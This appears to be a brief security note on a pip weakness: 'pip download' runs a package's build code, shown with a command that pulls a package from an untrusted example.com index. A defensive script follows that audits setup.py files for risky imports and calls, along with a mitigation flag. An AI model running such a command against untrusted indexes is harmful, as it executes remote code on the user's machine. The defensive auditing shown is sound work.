# PIP Exploits

## pip download

Python pip executes code from a package's tar file once the `download` option has been triggered, not only on install. Therefore, a hand-crafted Python module needs to be created and built. After that, pip can be used in the following way:

```sh
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
```

A detailed blog post on this has been written by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/).
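Because the download step already runs the archive's build code, a source archive should be inspected without letting pip touch it. The following is an added example, not code from the original page or the linked blog post: it reads `setup.py` out of a tar archive in memory and flags risky imports and calls by parsing the AST only. The function names, the heuristic lists and the sample archives are assumptions constructed for illustration.

```python
import ast
import io
import tarfile

# Assumed heuristic lists: things a metadata-only setup.py rarely needs.
RISKY_MODULES = {"os", "subprocess", "socket", "urllib", "requests", "base64", "ctypes"}
RISKY_CALLS = {"exec", "eval", "compile", "__import__"}

def audit_setup_source(source):
    """Return sorted findings for one setup.py; the source is parsed, never run."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        names = []
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        for name in names:
            if name.split(".")[0] in RISKY_MODULES:
                findings.add("import:" + name)
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in RISKY_CALLS):
            findings.add("call:" + node.func.id)
    return sorted(findings)

def audit_sdist(fileobj):
    """Map every setup.py in a tar archive to its findings, without extracting to disk."""
    report = {}
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.split("/")[-1] == "setup.py":
                source = tar.extractfile(member).read().decode("utf-8", "replace")
                report[member.name] = audit_setup_source(source)
    return report

def build_sample_sdist(setup_source):
    """Constructed sample: an in-memory .tar.gz holding a single setup.py."""
    buf = io.BytesIO()
    data = setup_source.encode()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("sample_pkg-0.1/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf

# Constructed inputs: one setup.py that runs a process at build time, one that does not.
SUSPICIOUS = ("import subprocess\nfrom setuptools import setup\n"
              "subprocess.run(['echo', 'build-time code'])\nsetup(name='sample_pkg')\n")
CLEAN = "from setuptools import setup\nsetup(name='sample_pkg', version='0.1')\n"
```

An empty findings list only means none of the listed patterns appeared. Passing `--only-binary=:all:` to `pip download` makes pip refuse source archives entirely, so no build code from the package runs during the download.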